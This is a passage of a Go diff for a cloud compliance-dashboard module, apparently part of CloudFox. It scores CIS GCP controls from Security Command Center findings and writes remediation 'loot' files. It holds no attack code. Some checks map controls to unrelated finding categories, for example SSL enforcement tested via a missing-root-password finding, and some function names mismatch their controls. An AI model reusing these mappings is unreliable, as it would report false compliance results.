findings { + m.addFailure(control, resource, "vpc-network", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_2_LegacyNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure legacy networks do not exist", + Description: "Legacy networks lack granular subnet control and should not be used", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Migrate from legacy networks to VPC networks", + } + + if findings, ok := m.sccFindings["LEGACY_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_3_DNSSEC(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure DNSSEC is enabled for Cloud DNS", + Description: "DNSSEC protects against DNS spoofing attacks", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable DNSSEC for all Cloud DNS managed zones", + } + + if findings, ok := m.sccFindings["DNSSEC_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_4_RSASHA1(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RSASHA1 is not used for zone-signing and key-signing", + Description: "RSASHA1 is considered weak for DNSSEC", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use 
RSASHA256 or ECDSAP256SHA256 for DNSSEC", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_5_RDPAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RDP access is restricted from the Internet", + Description: "RDP (port 3389) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict RDP access to specific IP ranges", + } + + if findings, ok := m.sccFindings["OPEN_RDP_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing RDP from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_6_SSHAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSH access is restricted from the Internet", + Description: "SSH (port 22) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict SSH access to specific IP ranges or use IAP", + } + + if findings, ok := m.sccFindings["OPEN_SSH_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing SSH from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m 
*ComplianceDashboardModule) checkCIS_3_7_FlowLogs(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC Flow Logs is enabled for every subnet", + Description: "VPC Flow Logs provide network traffic visibility", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable VPC Flow Logs on all subnets", + } + + if findings, ok := m.sccFindings["FLOW_LOGS_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_8_SSLPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSL policies use secure TLS versions", + Description: "SSL policies should require TLS 1.2 or higher", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Update SSL policies to require TLS 1.2+", + } + + if findings, ok := m.sccFindings["WEAK_SSL_POLICY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_9_FirewallLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure firewall rule logging is enabled", + Description: "Firewall rule logging provides audit trail for network access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable logging on all firewall rules", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_10_VPCNetworkPeering(ctx context.Context, logger internal.Logger) { 
+ control := ComplianceControl{ + ControlID: "CIS-3.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC network peering is properly configured", + Description: "Review VPC peering for appropriate trust relationships", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Review and document all VPC peering relationships", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 4: Virtual Machine Controls +func (m *ComplianceDashboardModule) checkCIS_4_1_DefaultServiceAccount(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default Compute Engine service account is not used", + Description: "VMs should use custom service accounts with minimal permissions", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Create custom service accounts for compute instances", + } + + if findings, ok := m.sccFindings["DEFAULT_SERVICE_ACCOUNT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs using default service account", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "compute-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_2_BlockProjectWideSSH(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure block project-wide SSH keys is enabled", + Description: "Block project-wide SSH keys to enforce instance-level access control", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable 'Block project-wide SSH keys' on all instances", + } + + if findings, ok := m.sccFindings["PROJECT_WIDE_SSH_KEYS_ALLOWED"]; ok && len(findings) > 0 
{ + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_3_OSLogin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure OS Login is enabled", + Description: "OS Login provides centralized SSH access management via IAM", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable OS Login at project or instance level", + } + + if findings, ok := m.sccFindings["OS_LOGIN_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_4_SerialPortDisabled(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure serial port access is disabled", + Description: "Serial port access should be disabled for security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable serial port access on all instances", + } + + if findings, ok := m.sccFindings["SERIAL_PORT_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_5_IPForwarding(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure IP forwarding is disabled unless required", + Description: "IP forwarding should only be enabled on NAT/gateway instances", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable IP forwarding 
on instances that don't require it", + } + + if findings, ok := m.sccFindings["IP_FORWARDING_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_6_PublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VMs do not have public IP addresses", + Description: "VMs should use private IPs and access internet via NAT", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Remove public IPs and use Cloud NAT for internet access", + } + + if findings, ok := m.sccFindings["PUBLIC_IP_ADDRESS"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs with public IP addresses", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_7_ShieldedVM(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Shielded VM is enabled", + Description: "Shielded VMs provide verifiable integrity and boot security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable Shielded VM features on all instances", + } + + if findings, ok := m.sccFindings["SHIELDED_VM_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_8_ComputeEncryption(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.8", + Framework: 
"CIS-GCP-2.0", + ControlName: "Ensure Compute Engine disks are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for disk encryption", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for all Compute Engine disks", + } + + if findings, ok := m.sccFindings["DISK_CSEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_9_ConfidentialComputing(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.9", + Framework: "CIS-GCP-2.0", + ControlName: "Consider enabling Confidential Computing for sensitive workloads", + Description: "Confidential VMs encrypt data in use", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Evaluate Confidential Computing for sensitive workloads", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 5: Storage Controls +func (m *ComplianceDashboardModule) checkCIS_5_1_UniformBucketAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure uniform bucket-level access is enabled", + Description: "Uniform bucket-level access simplifies and secures IAM permissions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable uniform bucket-level access on all buckets", + } + + if findings, ok := m.sccFindings["BUCKET_IAM_NOT_MONITORED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_5_2_PublicBuckets(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + 
ControlID: "CIS-5.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Storage buckets are not anonymously or publicly accessible", + Description: "Storage buckets should not allow public access", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove allUsers and allAuthenticatedUsers from bucket IAM", + } + + publicFindings := []string{} + for category, findings := range m.sccFindings { + if strings.Contains(strings.ToLower(category), "public_bucket") || + strings.Contains(strings.ToLower(category), "bucket_public") { + publicFindings = append(publicFindings, findings...) + } + } + + if len(publicFindings) > 0 { + control.Status = "FAIL" + control.FailCount = len(publicFindings) + control.Details = fmt.Sprintf("Found %d publicly accessible buckets", len(publicFindings)) + + for _, resource := range publicFindings { + m.addFailure(control, resource, "storage-bucket", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 6: Cloud SQL Controls +func (m *ComplianceDashboardModule) checkCIS_6_1_SQLPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances do not have public IPs", + Description: "Cloud SQL should use private IP only", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Configure Cloud SQL to use private IP only", + } + + if findings, ok := m.sccFindings["SQL_PUBLIC_IP"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d Cloud SQL instances with public IP", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "cloudsql-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + 
m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_2_SQLAuthorizedNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL authorized networks do not include 0.0.0.0/0", + Description: "Restrict authorized networks to specific IP ranges", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove 0.0.0.0/0 from authorized networks", + } + + if findings, ok := m.sccFindings["SQL_WORLD_READABLE"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_3_SQLSSLRequired(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL requires SSL connections", + Description: "SSL should be required for all database connections", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable 'Require SSL' for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_NO_ROOT_PASSWORD"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_4_SQLNoPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL database instances are configured with automated backups", + Description: "Automated backups ensure data recovery capability", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable automated backups for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_BACKUP_DISABLED"]; ok && 
	len(findings) > 0 {
		control.Status = "FAIL"
		control.FailCount = len(findings)
	} else {
		control.Status = "PASS"
	}

	m.mu.Lock()
	m.Controls = append(m.Controls, control)
	m.mu.Unlock()
}

// checkCIS_6_5_SQLBackups evaluates CIS 6.5.
// NOTE(review): despite the method name, the control implemented here is
// "instances use the latest major database version", not backups (backups are
// handled by checkCIS_6_4_SQLNoPublicIP). Manual-only: Status is always
// MANUAL because no SCC finding category is consulted.
func (m *ComplianceDashboardModule) checkCIS_6_5_SQLBackups(ctx context.Context, logger internal.Logger) {
	control := ComplianceControl{
		ControlID:   "CIS-6.5",
		Framework:   "CIS-GCP-2.0",
		ControlName: "Ensure Cloud SQL instances are using the latest major version",
		Description: "Use latest major database version for security updates",
		Severity:    "MEDIUM",
		Status:      "MANUAL",
		Remediation: "Upgrade Cloud SQL instances to latest major version",
	}
	m.mu.Lock()
	m.Controls = append(m.Controls, control)
	m.mu.Unlock()
}

// checkCIS_6_6_SQLContainedDB records CIS 6.6 (SQL Server contained database
// authentication) as a manual-review control; no automated evidence is
// evaluated, so Status stays MANUAL.
func (m *ComplianceDashboardModule) checkCIS_6_6_SQLContainedDB(ctx context.Context, logger internal.Logger) {
	control := ComplianceControl{
		ControlID:   "CIS-6.6",
		Framework:   "CIS-GCP-2.0",
		ControlName: "Ensure contained database authentication is off for SQL Server",
		Description: "Disable contained database authentication for SQL Server",
		Severity:    "MEDIUM",
		Status:      "MANUAL",
		Remediation: "Set 'contained database authentication' flag to 'off'",
	}
	m.mu.Lock()
	m.Controls = append(m.Controls, control)
	m.mu.Unlock()
}

// checkCIS_6_7_SQLCrossDBAOwnership records CIS 6.7 (SQL Server cross-db
// ownership chaining) as a manual-review control; Status stays MANUAL.
func (m *ComplianceDashboardModule) checkCIS_6_7_SQLCrossDBAOwnership(ctx context.Context, logger internal.Logger) {
	control := ComplianceControl{
		ControlID:   "CIS-6.7",
		Framework:   "CIS-GCP-2.0",
		ControlName: "Ensure cross db ownership chaining is off for SQL Server",
		Description: "Disable cross db ownership chaining for SQL Server",
		Severity:    "MEDIUM",
		Status:      "MANUAL",
		Remediation: "Set 'cross db ownership chaining' flag to 'off'",
	}
	m.mu.Lock()
	m.Controls = append(m.Controls, control)
	m.mu.Unlock()
}

// Section 7: BigQuery Controls
func (m *ComplianceDashboardModule) checkCIS_7_1_BigQueryCMEK(ctx context.Context, logger internal.Logger) {
	control := 
ComplianceControl{ + ControlID: "CIS-7.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_CMEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_2_BigQueryTableCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery tables are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery tables", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery tables", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_3_BigQueryDatasetPublic(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are not publicly accessible", + Description: "BigQuery datasets should not allow allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible BigQuery datasets", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "bigquery-dataset", m.getProjectFromResource(resource)) + } + } else { + control.Status 
	= "PASS"
	}

	m.mu.Lock()
	m.Controls = append(m.Controls, control)
	m.mu.Unlock()
}

// ------------------------------
// Framework Mapping
// ------------------------------
// mapToFrameworks tallies the evaluated controls into per-framework pass/fail
// counters and computes each framework's compliance score.
// NOTE(review): only the "CIS-GCP-2.0" framework entry is updated here — no
// cross-framework mapping of CIS controls is actually performed yet, despite
// the function name.
func (m *ComplianceDashboardModule) mapToFrameworks() {
	// Tally every evaluated control into the CIS framework stats.
	for _, control := range m.Controls {
		// NOTE(review): this mutation only persists if m.Frameworks values are
		// pointers — confirm the map's value type.
		if fw, ok := m.Frameworks["CIS-GCP-2.0"]; ok {
			fw.TotalControls++
			switch control.Status {
			case "PASS":
				fw.PassedControls++
			case "FAIL":
				fw.FailedControls++
			case "MANUAL":
				fw.ManualControls++
			case "NOT_APPLICABLE":
				fw.NAControls++
			}
		}
	}

	// Score = passed / (passed + failed); MANUAL and N/A controls are excluded
	// from the denominator so unassessed controls don't drag the score down.
	for _, fw := range m.Frameworks {
		if fw.TotalControls > 0 {
			assessed := fw.PassedControls + fw.FailedControls
			if assessed > 0 {
				fw.Score = float64(fw.PassedControls) / float64(assessed) * 100
			}
		}
	}
}

// ------------------------------
// Helper Functions
// ------------------------------
// addFailure records a per-resource ComplianceFailure derived from a failed
// control, appends it under the module lock, and mirrors it into the loot
// files.
func (m *ComplianceDashboardModule) addFailure(control ComplianceControl, resource, resourceType, projectID string) {
	failure := ComplianceFailure{
		ControlID:    control.ControlID,
		Framework:    control.Framework,
		ControlName:  control.ControlName,
		Severity:     control.Severity,
		ResourceName: resource,
		ResourceType: resourceType,
		ProjectID:    projectID,
		Details:      control.Details,
		Remediation:  control.Remediation,
		RiskScore:    m.calculateComplianceRiskScore(control.Severity),
	}

	m.mu.Lock()
	m.Failures = append(m.Failures, failure)
	m.mu.Unlock()

	// Add to loot (addFailureToLoot takes the lock itself, so it must be
	// called outside the critical section above).
	m.addFailureToLoot(failure)
}

// calculateComplianceRiskScore maps a severity label to a fixed 0-100 risk
// score; unknown severities get a floor score of 10.
func (m *ComplianceDashboardModule) calculateComplianceRiskScore(severity string) int {
	switch severity {
	case "CRITICAL":
		return 100
	case "HIGH":
		return 80
	case "MEDIUM":
		return 50
	case "LOW":
		return 25
	default:
		return 10
	}
}

func (m *ComplianceDashboardModule) getProjectFromResource(resource string) string {
	// Extract project ID from resource name
	// Format: 
projects/{project}/... + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ComplianceDashboardModule) initializeLootFiles() { + m.LootMap["compliance-critical-failures"] = &internal.LootFile{ + Name: "compliance-critical-failures", + Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["compliance-remediation-commands"] = &internal.LootFile{ + Name: "compliance-remediation-commands", + Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["compliance-by-framework"] = &internal.LootFile{ + Name: "compliance-by-framework", + Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["compliance-failed-controls"] = &internal.LootFile{ + Name: "compliance-failed-controls", + Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) { + m.mu.Lock() + defer m.mu.Unlock() + + // Critical failures + if failure.Severity == "CRITICAL" { + m.LootMap["compliance-critical-failures"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s - %s\n"+ + "# =============================================================================\n"+ + "# Framework: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n"+ + "# Risk Score: %d\n"+ + "# Remediation: %s\n\n", + failure.ControlID, + failure.ControlName, + failure.Framework, + 
failure.ResourceName, + failure.ProjectID, + failure.RiskScore, + failure.Remediation, + ) + } + + // Remediation commands + m.LootMap["compliance-remediation-commands"].Contents += fmt.Sprintf( + "# %s: %s\n"+ + "# Resource: %s\n"+ + "# %s\n\n", + failure.ControlID, + failure.ControlName, + failure.ResourceName, + failure.Remediation, + ) + + // Failed controls + m.LootMap["compliance-failed-controls"].Contents += fmt.Sprintf( + "%s (%s) - %s\n", + failure.ControlID, + failure.Severity, + failure.ResourceName, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ComplianceDashboardModule) buildTables() []internal.TableFile { + // Sort controls by severity, then control ID + sort.Slice(m.Controls, func(i, j int) bool { + if m.Controls[i].Status == "FAIL" && m.Controls[j].Status != "FAIL" { + return true + } + if m.Controls[i].Status != "FAIL" && m.Controls[j].Status == "FAIL" { + return false + } + severityOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + if severityOrder[m.Controls[i].Severity] != severityOrder[m.Controls[j].Severity] { + return severityOrder[m.Controls[i].Severity] < severityOrder[m.Controls[j].Severity] + } + return m.Controls[i].ControlID < m.Controls[j].ControlID + }) + + // Controls table + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range m.Controls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + // Failures table + failuresHeader := []string{ + 
"Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range m.Failures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + // Framework summary table + frameworkHeader := []string{ + "Framework", + "Version", + "Total", + "Passed", + "Failed", + "Manual", + "Score (%)", + } + + var frameworkBody [][]string + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + frameworkBody = append(frameworkBody, []string{ + fw.Name, + fw.Version, + fmt.Sprintf("%d", fw.TotalControls), + fmt.Sprintf("%d", fw.PassedControls), + fmt.Sprintf("%d", fw.FailedControls), + fmt.Sprintf("%d", fw.ManualControls), + fmt.Sprintf("%.1f", fw.Score), + }) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }, + } + + // Add failures table if any + if len(failuresBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + // Add framework summary table + if len(frameworkBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-summary", + Header: frameworkHeader, + Body: frameworkBody, + }) + } + + return tables +} + +func (m *ComplianceDashboardModule) collectLootFiles() []internal.LootFile { + // Add framework summary to loot + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + m.LootMap["compliance-by-framework"].Contents += fmt.Sprintf( + "## %s v%s\n"+ + "Total Controls: %d\n"+ + "Passed: %d\n"+ + "Failed: %d\n"+ + "Manual Review: %d\n"+ + "Compliance Score: %.1f%%\n\n", + fw.Name, + fw.Version, + fw.TotalControls, + fw.PassedControls, + fw.FailedControls, + fw.ManualControls, + fw.Score, + ) + } + } + + // Collect 
loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *ComplianceDashboardModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID - prefer project metadata, fall back to hierarchy + orgID := "" + for _, metadata := range m.projectMetadata { + if parent, ok := metadata["parent"]; ok { + if parentStr, ok := parent.(string); ok && strings.HasPrefix(parentStr, "organizations/") { + orgID = strings.TrimPrefix(parentStr, "organizations/") + break + } + } + } + if orgID == "" && m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = ComplianceDashboardOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 { + outputData.ProjectLevelData[projectID] = ComplianceDashboardOutput{Table: projectTables, Loot: 